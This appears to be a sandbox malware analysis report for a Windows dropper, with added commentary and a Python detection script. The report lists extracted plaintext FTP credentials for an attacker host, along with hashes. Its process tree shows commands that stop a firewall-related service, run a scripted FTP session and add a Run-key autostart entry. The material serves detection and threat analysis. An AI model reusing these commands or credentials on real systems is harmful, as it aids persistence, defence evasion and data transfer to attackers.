Analysis

  • max time kernel
    149s
  • max time network
    174s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags
    arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
  • submitted
    19-09-2022 12:28

General

  • Target

    e7febdc66f0e8106e398a1addd39292b21b3d4b6e3c8e041e1a2f7ae971805f3.exe

  • Size

    89KB

  • MD5

    c23796485337acadb13e02480bf06059

  • SHA1

    71fab61154104cc1fb80bf94be5310beef0de4c5

  • SHA256

    e7febdc66f0e8106e398a1addd39292b21b3d4b6e3c8e041e1a2f7ae971805f3

  • SHA512

    993c098e4da88034936135ccc55591d38b3eaaa97ed756d0811f32fba48d46c945312ac9ac1eb24f011bf13d6a73a34b7d2790c00586656d18d0171123bfbe44

  • SSDEEP

    1536:e5GJEhlcbW5sk1BlfLvveIbXWm+nwN6JKzs5gwCt4J6v43NzCl7/Hs3U3mRhshHK:EGu9BlfzWIbXWm+w0Jb5jJ6W1uMEztUP

Score
10/10

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    gupiao.laden.biz
  • Port:
    21
  • Username:
    user1961642
  • Password:
    mBZcfyJQ

These are plaintext FTP credentials, consistent with the "ftp -s:ftp.txt" invocation in the process tree below: the -s: switch makes ftp.exe read its commands from a script file, so host, user and password sit in the clear in the dropped ftp.txt and cross the wire unencrypted on TCP/21. Treat gupiao.laden.biz as an indicator; any outbound TCP/21 to it from a host that ran this sample is worth an alert. The report does not show the ftp.txt contents, so whether the session uploads or downloads cannot be read from this page.

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Drops file in System32 directory 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    Caveat: the sentence above is the sandbox's fixed description for this signature, not an observation specific to this sample. Nothing else in the report points to encryption (no mass file writes or renames are recorded); what is recorded is a dropper that stops the SharedAccess service (the Windows Firewall/ICS service on Windows XP; on Windows 7, where this ran, SharedAccess is only Internet Connection Sharing and the firewall is MpsSvc), launches a scripted FTP session and installs a Run key. Read the ransomware wording as a heuristic, not a finding.

  • Modifies Internet Explorer settings 1 TTPs 44 IoCs
  • Runs net.exe
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e7febdc66f0e8106e398a1addd39292b21b3d4b6e3c8e041e1a2f7ae971805f3.exe
    "C:\Users\Admin\AppData\Local\Temp\e7febdc66f0e8106e398a1addd39292b21b3d4b6e3c8e041e1a2f7ae971805f3.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1640
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vchott.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vchott.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1372
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c C:\Users\Admin\AppData\Local\Temp\~5ABE.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vchott.exe
        3⤵
        • Drops file in System32 directory
        • Drops file in Windows directory
        • Suspicious use of WriteProcessMemory
        PID:2040
        • C:\Windows\SysWOW64\net.exe
          net stop sharedaccess
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1820
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop sharedaccess
            5⤵
            PID:1532
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" http://goo.gl/ewgWF
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:912
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:912 CREDAT:275457 /prefetch:2
            5⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:1620
        • C:\Windows\SysWOW64\ftp.exe
          ftp -s:ftp.txt
          4⤵
          PID:596
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c type "c:\windows\system32\vvtn.txt"
          4⤵
          PID:1212
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c type "c:\windows\system32\aabb.txt"
          4⤵
          PID:1956
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v TINTSETP /t REG_SZ /d "C:\WINDOWS\system32\TINTSETP.exe" /f
          4⤵
          • Adds Run key to start application
          PID:2012
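
The tree reads as a self-extracting dropper: IXP000.TMP is the directory IExpress packages unpack into, vchott.exe hands off to the batch file ~5ABE.bat, and that script stops the SharedAccess service, opens a goo.gl shortlink in Internet Explorer, runs a scripted FTP session and registers TINTSETP under the HKCU Run key, all as children of one cmd.exe (PID 2040). The Python below is an added detection example, not part of this report or of any sandbox product: it replays the tree as constructed Sysmon-style process-creation events (PIDs, images and command lines from the report; the parent PID 1000 of the first process is an assumption, and the two "type" commands and net1.exe are left out for brevity), tags the firewall-service stop, the scripted ftp.exe run, the Run-key write and the temp-directory batch launch, correlates the tags up the parent chain to a single root, and pulls the autostart target out of the reg.exe command line. Matching MpsSvc as well as SharedAccess is a generalisation beyond the report (SharedAccess was the firewall/ICS service on Windows XP; on Vista and later the firewall is MpsSvc).

```python
# Added example (not from the sandbox report): correlate the dropper chain above from
# Sysmon EID 1 / Security 4688-style process-creation events.
from __future__ import annotations
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str

TEMP = r"C:\Users\Admin\AppData\Local\Temp"
# Constructed from the report's process tree. PIDs, images and command lines are the
# report's; the parent PID 1000 of the first process is an assumption (not in the report).
SAMPLE_EVENTS = [
    ProcEvent(1640, 1000, TEMP + r"\e7febdc66f0e8106e398a1addd39292b21b3d4b6e3c8e041e1a2f7ae971805f3.exe",
              '"' + TEMP + r'\e7febdc66f0e8106e398a1addd39292b21b3d4b6e3c8e041e1a2f7ae971805f3.exe"'),
    ProcEvent(1372, 1640, TEMP + r"\IXP000.TMP\vchott.exe", TEMP + r"\IXP000.TMP\vchott.exe"),
    ProcEvent(2040, 1372, r"C:\Windows\SysWOW64\cmd.exe",
              "cmd.exe /c " + TEMP + r"\~5ABE.bat " + TEMP + r"\IXP000.TMP\vchott.exe"),
    ProcEvent(1820, 2040, r"C:\Windows\SysWOW64\net.exe", "net stop sharedaccess"),
    ProcEvent(912, 2040, r"C:\Program Files\Internet Explorer\iexplore.exe",
              r'"C:\Program Files\Internet Explorer\iexplore.exe" http://goo.gl/ewgWF'),
    ProcEvent(596, 2040, r"C:\Windows\SysWOW64\ftp.exe", "ftp -s:ftp.txt"),
    ProcEvent(2012, 2040, r"C:\Windows\SysWOW64\reg.exe",
              r'REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run'
              r' /v TINTSETP /t REG_SZ /d "C:\WINDOWS\system32\TINTSETP.exe" /f'),
]

# SharedAccess is what the report shows (firewall/ICS service on XP); MpsSvc is the
# Windows Firewall service on Vista and later and is a generalisation beyond the report.
FIREWALL_SERVICES = {"sharedaccess", "mpssvc"}
RUN_KEY_RE = re.compile(r"\\currentversion\\run(?:once)?\b")            # HKCU or HKLM Run/RunOnce
FTP_SCRIPT_RE = re.compile(r"(?:^|\s)-s:\S+")                           # ftp.exe driven by a script file
TEMP_BATCH_RE = re.compile(r"\\(?:temp|tmp)\\[^\s\"]*\.(?:bat|cmd)\b")  # batch launched from a temp dir

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev: ProcEvent) -> set[str]:
    """Technique tags one event matches; empty for events the rules ignore."""
    tags: set[str] = set()
    name, cl = basename(ev.image), ev.cmdline.lower()
    toks = cl.split()
    if name in {"net.exe", "net1.exe"} and "stop" in toks and toks[-1] in FIREWALL_SERVICES:
        tags.add("firewall_service_stop")
    if name == "ftp.exe" and FTP_SCRIPT_RE.search(cl):
        tags.add("ftp_scripted_session")
    if name == "reg.exe" and toks[1:2] == ["add"] and RUN_KEY_RE.search(cl):
        tags.add("run_key_persistence")
    if name == "cmd.exe" and TEMP_BATCH_RE.search(cl):
        tags.add("temp_batch_launch")
    return tags

def root_of(pid: int, by_pid: dict[int, ProcEvent]) -> int:
    """Follow parent links to the topmost process present in the event set."""
    seen: set[int] = set()
    while pid in by_pid and by_pid[pid].ppid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid].ppid
    return pid

def detect(events: list[ProcEvent]) -> dict[int, set[str]]:
    """Union of technique tags seen anywhere under each process-tree root."""
    by_pid = {e.pid: e for e in events}
    hits: dict[int, set[str]] = {}
    for ev in events:
        tags = classify(ev)
        if tags:
            hits.setdefault(root_of(ev.pid, by_pid), set()).update(tags)
    return hits

def alerts(events: list[ProcEvent], threshold: int = 2) -> dict[int, list[str]]:
    """Roots with at least `threshold` distinct techniques; a lone hit is treated as noise."""
    return {r: sorted(t) for r, t in detect(events).items() if len(t) >= threshold}

def parse_reg_add(cmdline: str) -> dict[str, str] | None:
    """Key, value name and data of a 'reg add' command line; None if it is not one."""
    toks = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    if len(toks) < 3 or basename(toks[0]) not in {"reg", "reg.exe"} or toks[1].lower() != "add":
        return None
    out = {"key": toks[2], "value": "(Default)", "data": ""}
    for i, tok in enumerate(toks[3:-1], start=3):
        if tok.lower() == "/v":
            out["value"] = toks[i + 1]
        elif tok.lower() == "/d":
            out["data"] = toks[i + 1]
    return out

if __name__ == "__main__":
    print(alerts(SAMPLE_EVENTS))                      # {1640: [four technique tags]}
    print(parse_reg_add(SAMPLE_EVENTS[-1].cmdline))   # TINTSETP -> C:\WINDOWS\system32\TINTSETP.exe
```

Correlating by root rather than by immediate parent is what makes the rule useful against this sample: the interesting children all hang off cmd.exe 2040, but the process that an analyst needs to name is the original dropper 1640, and any one of the four behaviours on its own (a scripted ftp.exe run, a Run-key write) is common enough in legitimate administration that the threshold of two is what keeps the alert volume down.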

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize: 340B
    MD5: 29293a10c7dc806503106b037795ba72
    SHA1: ab9d49afb52a0df02a730e4cb8221f947b8ed46e
    SHA256: a8cb68ec19bf5899f3e363ed41a4233f03f9f129bff13947607d262e431c1879
    SHA512: 28da3d70b108a48488ed33e6948e01a152bf3898d351bc308abfb50824db1d1defe32e27055be5c350751ed4d669c5b67f810802b42070b97affd91257fe2960

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\tcz8fqz\imagestore.dat
    Filesize: 5KB
    MD5: 7fb34e3665c93d59896e989e43696fe2
    SHA1: 026b65288ce78f1b63eca325d608fdd0565e1433
    SHA256: bb2eee636d74ef588fc68a051c0b0fcd098313b54bc28be75b965f36973fd241
    SHA512: 3d12a7b108737b39b67250fb7861c86853d18608bf1996ba8462f0ce7c45215cf7edb651a1aeaabeaf579da31f344f77192a81e53d3f77a2ddb75b7e83361626

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\b.txt
    Filesize: 12B
    MD5: 4f806da7153d20c8ea56941ddabed0b7
    SHA1: 05d71958b8edd3969ea17d192dbdeb2661fcf7be
    SHA256: a3e66dec8c136ef05b6cb5c936e9ca3cef7adc954cf35a0df7916a77bebb4775
    SHA512: 1930320d4976ace088101a8cddcd156b9297a42b4f5b27c908c49de0e7ac0203080e576ad23454c58571960a3e8e7aac0a0b1b5784b42cf7c04d1681808b1ce6

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ftp.txt
    Filesize: 318B
    MD5: 7b5186bb18dcda8af60689f10963044b
    SHA1: cbfe9004d2f580da78171f3633c5262b15ec481b
    SHA256: 92ddd2439b76777fd556af30dd4a699ab517883cb0d12b48ac627735c3f8d44f
    SHA512: 1de723d1d1918c9295c4cdfd52ec75c2a52b7cc94d5b66c32ff22bcc864a23c85d9e3b7eca864e9f7c53a2fa1383f2188498425cbaa43969fe04910686a07881

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vchott.exe
    Filesize: 52KB
    MD5: f47418fb97f4da4c117ecec13c17606e
    SHA1: 5bec90e612bc08ba99fd33f004aca1cd891c298d
    SHA256: b61b31dccfda791f2e0bcdf00cf1ac41b86a7175e6ba8256c34d7e5ee0f34739
    SHA512: 13540d4e28212a9f2b080e5dfbf1b7d45b861a30053e139c08a0f977823a5824b1f3fe6a6fa2b2a291fb38a6460114010f361e53c7f4f9ef4b4af52be62645c8

  • C:\Users\Admin\AppData\Local\Temp\~5ABE.bat
    Filesize: 4KB
    MD5: bd95495789a0beed40addfd5dc83a26c
    SHA1: 5447c3d3d3fdc990ff61baff41886f05bd2b0ccb
    SHA256: b881cbde09a0c99a5f68483cf2cb977802de6a1f379b7a24a6d85fa12717950e
    SHA512: 51b7b323984195546345447724dfd097d153e1b0fc4196f1d707515fb351657fb37d63accaf030ca9e868692994455738917c2fcd7a4191cb71e4959d21c76fd

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\VER8EC8J.txt
    Filesize: 608B
    MD5: 0e039ea1ed9e739c22ef0df055631e08
    SHA1: a6ceafa9e2ea0f5ad01c56af21b3e92957a4c113
    SHA256: 052e6e7d761c319f2c9290b3e570346c8e9af4a0144fa6deb5adccdb915cc31a
    SHA512: 20ae573a1c42ddc107fd909d3be8632626090f6f9ddf59bd7920c63ac1a3e6e6b0307ed46d0e18c9bd4310051c3f3ba5315a568c6ca90965e565d5e9884d959d

  • \??\c:\windows\SysWOW64\aabb.txt
    Filesize: 96B
    MD5: b6f6b78ae8d54d14524c1456ea060cd9
    SHA1: b45bd523301af01c8458cdd04855afce45d3d9fb
    SHA256: db9f2b1f4d454cbc3448da5d52b9e57aa7345d0becdb1ca83881cc36e8bc8bbe
    SHA512: ddb2a2498232d3ad9b5ef09bb81975f6203ccedb3292058543d49e9724e041d60c864d968390f843e6f4a89b40a799667be809d764851b8f623da7608fce10d0

  • \Users\Admin\AppData\Local\Temp\IXP000.TMP\vchott.exe
    Filesize: 52KB
    MD5: f47418fb97f4da4c117ecec13c17606e
    SHA1: 5bec90e612bc08ba99fd33f004aca1cd891c298d
    SHA256: b61b31dccfda791f2e0bcdf00cf1ac41b86a7175e6ba8256c34d7e5ee0f34739
    SHA512: 13540d4e28212a9f2b080e5dfbf1b7d45b861a30053e139c08a0f977823a5824b1f3fe6a6fa2b2a291fb38a6460114010f361e53c7f4f9ef4b4af52be62645c8

  • memory/596-69-0x0000000000000000-mapping.dmp
  • memory/1212-72-0x0000000000000000-mapping.dmp
  • memory/1372-57-0x0000000000000000-mapping.dmp
  • memory/1532-67-0x0000000000000000-mapping.dmp
  • memory/1640-54-0x0000000075071000-0x0000000075073000-memory.dmp
    Filesize: 8KB
  • memory/1820-65-0x0000000000000000-mapping.dmp
  • memory/1956-74-0x0000000000000000-mapping.dmp
  • memory/2012-77-0x0000000000000000-mapping.dmp
  • memory/2040-62-0x0000000000000000-mapping.dmp